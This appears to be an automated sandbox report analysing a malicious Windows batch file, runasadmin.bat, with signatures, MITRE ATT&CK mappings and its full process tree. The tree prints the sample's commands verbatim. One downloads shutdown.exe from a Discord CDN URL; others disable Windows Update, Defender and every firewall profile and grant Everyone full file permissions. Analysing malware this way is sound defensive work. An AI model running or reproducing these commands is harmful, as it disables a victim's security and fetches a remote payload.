Analysis

  • max time kernel
    35s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 18:04

General

  • Target

    runasadmin.bat

  • Size

    1KB

  • MD5

    27385fc8820b394db863c320f3bb48f2

  • SHA1

    5c231e5d149ff97d8d435ef9442a41a94eecf716

  • SHA256

    f7d324eec5fc6cec83bdafd21c65e6909d847c7ea40091b87243bfd5c2c0f549

  • SHA512

    66133441896602787b60e604962f181f06171d101765da80813a952636f245ace68d51971709f783749ee4f41ef9860912de82f5d87485c278635f6f82a802c0

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Modifies Windows Firewall 2 TTPs 7 IoCs
  • Possible privilege escalation attempt 3 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Delays execution with timeout.exe 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2300
    • C:\Windows\system32\sc.exe
      sc config "wuauserv" start= disabled
      2⤵
      • Launches sc.exe
      PID:2684
    • C:\Windows\system32\sc.exe
      sc config "TrustedInstaller" start= disabled
      2⤵
      • Launches sc.exe
      PID:2728
    • C:\Windows\system32\net.exe
      net stop wuauserv
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2576
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop wuauserv
        3⤵
          PID:2776
      • C:\Windows\system32\net.exe
        net stop TrustedInstaller
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2556
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop TrustedInstaller
          3⤵
            PID:2704
        • C:\Windows\system32\takeown.exe
          takeown /F C:\X\Y\Z /A /R
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2160
        • C:\Windows\system32\icacls.exe
          icacls C:\X\Y\Z /grant Everyone:F /T
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2752
        • C:\Windows\system32\icacls.exe
          icacls . /grant Everyone:F /T /C /Q
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2584
        • C:\Windows\system32\net.exe
          net stop "Windows Defender Service"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2460
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "Windows Defender Service"
            3⤵
              PID:2772
          • C:\Windows\system32\net.exe
            net stop "Windows Firewall"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2524
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "Windows Firewall"
              3⤵
                PID:2600
            • C:\Windows\system32\netsh.exe
              netsh firewall set opmode disable
              2⤵
              • Modifies Windows Firewall
              PID:2756
            • C:\Windows\system32\netsh.exe
              netsh firewall set opmode mode=DISABLE
              2⤵
              • Modifies Windows Firewall
              PID:2592
            • C:\Windows\system32\netsh.exe
              netsh advfirewall set currentprofile state off
              2⤵
              • Modifies Windows Firewall
              PID:2736
            • C:\Windows\system32\netsh.exe
              netsh advfirewall set domainprofile state off
              2⤵
              • Modifies Windows Firewall
              PID:564
            • C:\Windows\system32\netsh.exe
              netsh advfirewall set privateprofile state off
              2⤵
              • Modifies Windows Firewall
              PID:572
            • C:\Windows\system32\netsh.exe
              netsh advfirewall set publicprofile state off
              2⤵
              • Modifies Windows Firewall
              PID:1652
            • C:\Windows\system32\netsh.exe
              netsh advfirewall set allprofiles state off
              2⤵
              • Modifies Windows Firewall
              PID:1128
            • C:\Windows\system32\timeout.exe
              timeout /t 1 /nobreak
              2⤵
              • Delays execution with timeout.exe
              PID:1728
          • C:\Windows\explorer.exe
            "C:\Windows\explorer.exe"
            1⤵
              PID:2628

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Execution

            System Services

            1
            T1569

            Service Execution

            1
            T1569.002

            Command and Scripting Interpreter

            1
            T1059

            PowerShell

            1
            T1059.001

            Persistence

            Create or Modify System Process

            2
            T1543

            Windows Service

            2
            T1543.003

            Privilege Escalation

            Create or Modify System Process

            2
            T1543

            Windows Service

            2
            T1543.003

            Defense Evasion

            Impair Defenses

            1
            T1562

            Disable or Modify System Firewall

            1
            T1562.004

            File and Directory Permissions Modification

            1
            T1222

            Impact

            Service Stop

            1
            T1489

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/2300-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmp
              Filesize

              4KB

            • memory/2300-5-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
              Filesize

              9.6MB

            • memory/2300-6-0x000000001B220000-0x000000001B502000-memory.dmp
              Filesize

              2.9MB

            • memory/2300-8-0x0000000001F40000-0x0000000001F48000-memory.dmp
              Filesize

              32KB

            • memory/2300-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
              Filesize

              9.6MB

            • memory/2300-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
              Filesize

              9.6MB

            • memory/2300-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp
              Filesize

              9.6MB